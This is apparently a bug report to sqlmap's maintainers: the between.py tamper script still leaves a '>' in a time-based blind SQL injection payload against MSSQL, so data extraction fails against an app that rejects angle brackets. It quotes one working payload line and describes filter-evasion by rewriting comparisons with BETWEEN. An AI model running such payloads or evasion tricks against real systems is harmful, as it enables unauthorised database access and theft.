Hey there,

I was recently trying to perform a blind SQLi where < or > in the query caused the app to 404. I tried with the tamper script between.py and it allowed me to enumerate everything up to data extraction. However, when trying to extract data it failed, citing 404s as the reason and when I set debugging on I could see an angle bracket was still being used, as shown below (before the last CHAR(33)):

[14:47:23] [PAYLOAD] 44 IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(test_Date AS NVARCHAR(4000)),CHAR(32))) FROM testing.dbo.Log WHERE CONVERT(NVARCHAR(4000),test_Date)>CHAR(33)),1,1)) NOT BETWEEN 0 AND 1) WAITFOR DELAY '0:0:10'--

I took the same string and replaced the > with BETWEEN...AND on a local testbed and it worked, so for whatever reason the tamper script must not be processing that particular angle bracket.

I tried to edit the relevant query in queries.xml but that threw an error - ended up having to manually enumerate some info which was slow and painful, but got there in the end! ;)

Many thanks! :)